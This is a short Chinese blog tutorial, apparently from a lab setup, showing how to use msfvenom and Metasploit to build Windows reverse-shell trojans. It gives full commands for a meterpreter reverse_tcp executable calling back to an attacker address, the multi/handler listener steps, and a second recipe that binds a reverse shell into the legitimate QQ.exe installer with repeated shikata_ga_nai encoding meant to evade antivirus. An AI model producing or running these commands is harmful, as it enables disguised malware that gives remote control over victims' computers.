msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe
192.168.0.110是攻击者的监听机器,4444是被攻击机器监听端口
开启kali监听
- 启动msfconsole
- 开启监听
use exploit/multi/handler - 设置tcp监听
set payload windows/meterpreter/reverse_tcp
- 输入explore开始监听
木马上线
当被攻击的机器(我的是windows xp)点击生成的123.exe木马时,即可以监听到木马上线
- 查看系统信息
- 查看系统截图
等等可以一系列后渗透操作。。
msf绑定软件做木马
msf也可以绑定正常软件运行,在用户看来软件正常运行,但是这个软件后台同时偷偷启动木马程序,就拿一个qq软件做例子
将QQ.exe用作绑定木马
查看编码类型
msfvenom -l encoders
如图,有很多类型编码,我们选择x86/shikata_ga_nai 编码
捆绑木马
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.110 LPORT=8080 -e x86/shikata_ga_nai -x /root/lenkee/share/QQ.exe -i 5 -f exe -o /root/lenkee/share/QQ1.exe
其中-i 5是进行5次编码,其目的是为了面杀作用,但是这样作用已经没用了,照样被杀。生成了QQ2.exe文件
木马上线
- 启动监听
- exploit回车开始监听
- 将QQ2.exe文件拷贝回被攻击的机器,点击启动
- kali监听显示上线,但是在windows上的qq软件点击后却没有启动,不知道什么情况,有空研究一下
- 查看windows端口,发现8080后门端口被打开
744
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
